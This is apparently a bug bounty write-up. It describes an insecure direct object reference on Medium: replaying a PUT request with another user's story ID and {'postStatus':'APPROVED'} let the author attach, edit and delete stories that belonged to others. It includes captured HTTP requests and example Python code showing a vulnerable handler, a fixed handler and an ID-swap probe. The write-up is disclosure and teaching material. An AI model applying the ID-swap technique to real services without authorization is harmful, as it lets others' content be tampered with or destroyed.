Update and Delete any Story of any user on Medium by@ajdumanhug


Aj Dumanhug

Before the end of this year, two well-known people were hacked: Mark Zuckerberg, CEO of Facebook, and Sundar Pichai, CEO of Google. I was thinking, what if it's time for me to hack Barack Obama? But I know that isn't easy.


So, I decided to use my big brain to think my way out! Looking for a new angle, I found the "Request Story" button hiding behind the 'ellipsis' or 'more' icon.

But there's a problem. The author needs to approve my request before their story is added to my publication, and that is never going to happen. Apparently, though, I can add my own story to my publication without any approval step.

First step of adding a story to a publication.

Second and last step: choose the publication you want to add the story to.

My goal here is to add any story of another user to my publication without their consent, and I did that using the "Add story to publication" button.

While adding my own story to my publication, I intercepted the HTTP request so that I could modify the story ID.


My Story ID: 2a4b6810c12d
Story ID of the target: 1a3b579c101a

The HTTP request:

```http
PUT /testphzxc/2a4b6810c12d HTTP/1.1
Host: medium.com
Connection: keep-alive
Content-Length: 25
Accept: application/json
Origin: https://medium.com
X-XSRF-Token: {Redacted}
X-Obvious-CID: web
User-Agent: {Redacted}
Content-Type: application/json
Referer: {Redacted}
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8,nb;q=0.6
Cookie: {Redacted}

{"postStatus":"APPROVED"}
```

In the request line, next to the PUT method, you can see the ID of my story. I removed that ID and replaced it with the ID of the target's story.

Updated HTTP request:

```http
PUT /testphzxc/1a3b579c101a HTTP/1.1
Host: medium.com
Connection: keep-alive
Content-Length: 25
Accept: application/json
Origin: https://medium.com
X-XSRF-Token: {Redacted}
X-Obvious-CID: web
User-Agent: {Redacted}
Content-Type: application/json
Referer: {Redacted}
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8,nb;q=0.6
Cookie: {Redacted}

{"postStatus":"APPROVED"}
```

As mentioned above, the story is added to my publication without the author's consent. The request succeeds because the body sets the status directly:

{"postStatus":"APPROVED"}

Note what the server did and did not check. The request carried my own session cookie and XSRF token, so it was properly authenticated, and the publication in the path (testphzxc) was mine. What was missing was the authorization check tying the story ID to its author: the status "APPROVED" should only be accepted from the story's author, yet it was accepted from me for a story I did not own. Then *Poof*. The target's story was added to my publication.

Now what? Because the story was now part of my publication, I was able to edit or delete it, since publication editors have those rights over stories in their publication.
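To make the missing check concrete, here is an added example (not Medium's code and not from the original write-up) that models the "add story to publication" endpoint twice: once with the bug, where the handler only verifies that the caller edits the publication, and once with object-level authorization, where only the story's author can set APPROVED. It also includes a small probe that replays the test described above (first the attacker's own story ID, then the target's ID swapped into the path) against either handler. All names (Story, Publication, approve_vulnerable, approve_fixed, request_story, idor_probe) and the in-memory data are constructed for illustration; the story IDs and publication slug are the ones quoted in the write-up.

```python
from dataclasses import dataclass, field


class Forbidden(Exception):
    """Raised when the caller is not allowed to change this story's status."""


@dataclass
class Story:
    story_id: str
    author: str


@dataclass
class Publication:
    slug: str
    editors: set
    # story_id -> "REQUESTED" (an editor asked the author) or "APPROVED" (attached).
    posts: dict = field(default_factory=dict)


def fresh_state():
    """Constructed sample data (hypothetical): the attacker's story, the target's
    story, and the attacker's publication, using the IDs from the write-up."""
    stories = {
        "2a4b6810c12d": Story("2a4b6810c12d", author="attacker"),
        "1a3b579c101a": Story("1a3b579c101a", author="target"),
    }
    pubs = {"testphzxc": Publication("testphzxc", editors={"attacker"})}
    return stories, pubs


def approve_vulnerable(stories, pubs, user, pub_slug, story_id, body):
    """PUT /<pub_slug>/<story_id> as the bug behaved: the handler checks that
    the caller edits the publication but never who owns story_id, so any
    story ID in the path is accepted with postStatus APPROVED."""
    pub = pubs[pub_slug]
    if user not in pub.editors:
        raise Forbidden("caller does not edit this publication")
    stories[story_id]  # only confirms the story exists (KeyError otherwise)
    pub.posts[story_id] = body["postStatus"]
    return pub.posts[story_id]


def request_story(stories, pubs, user, pub_slug, story_id):
    """The legitimate "Request Story" step: an editor may only ask the author."""
    pub = pubs[pub_slug]
    if user not in pub.editors:
        raise Forbidden("caller does not edit this publication")
    stories[story_id]
    pub.posts[story_id] = "REQUESTED"
    return "REQUESTED"


def approve_fixed(stories, pubs, user, pub_slug, story_id, body):
    """Same endpoint with object-level authorization: APPROVED is accepted only
    from the story's author, and only when the author edits the publication
    (own story) or an editor has already filed a request (consent)."""
    pub = pubs[pub_slug]
    story = stories[story_id]
    if body.get("postStatus") != "APPROVED":
        raise ValueError("only APPROVED is handled in this example")
    if user != story.author:
        raise Forbidden("only the author can approve their own story")
    if user not in pub.editors and pub.posts.get(story_id) != "REQUESTED":
        raise Forbidden("no pending request from this publication")
    pub.posts[story_id] = "APPROVED"
    return "APPROVED"


def idor_probe(handler, attacker_story_id, victim_story_id):
    """Replays the write-up's test: approve the attacker's own story (must work),
    then resend with the victim's story ID in the path. Returns True when the
    swapped request also succeeds, i.e. the handler lacks the ownership check."""
    stories, pubs = fresh_state()
    body = {"postStatus": "APPROVED"}
    if handler(stories, pubs, "attacker", "testphzxc", attacker_story_id, body) != "APPROVED":
        raise RuntimeError("baseline request with own story should succeed")
    try:
        handler(stories, pubs, "attacker", "testphzxc", victim_story_id, body)
    except Forbidden:
        return False
    return True


if __name__ == "__main__":
    print("vulnerable handler exploitable:",
          idor_probe(approve_vulnerable, "2a4b6810c12d", "1a3b579c101a"))
    print("fixed handler exploitable:",
          idor_probe(approve_fixed, "2a4b6810c12d", "1a3b579c101a"))
```

The probe is the same test the write-up performs by hand: keep the authenticated session, change only the object identifier in the path, and see whether the server still honours the request. The fixed handler decides on the relationship between the caller and the referenced story, not on the caller's role in the publication alone, which is the property that was missing.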


Well, instead of attacking Mr. Obama's blog, I reported it to Medium. They fixed it and rewarded me with a $250 bounty, but I wanted more because I had found multiple bugs in my report: first, bypassing the Request Story approval, and second, updating and deleting any story. They then added $100 to the previous bounty, for a total of $350.
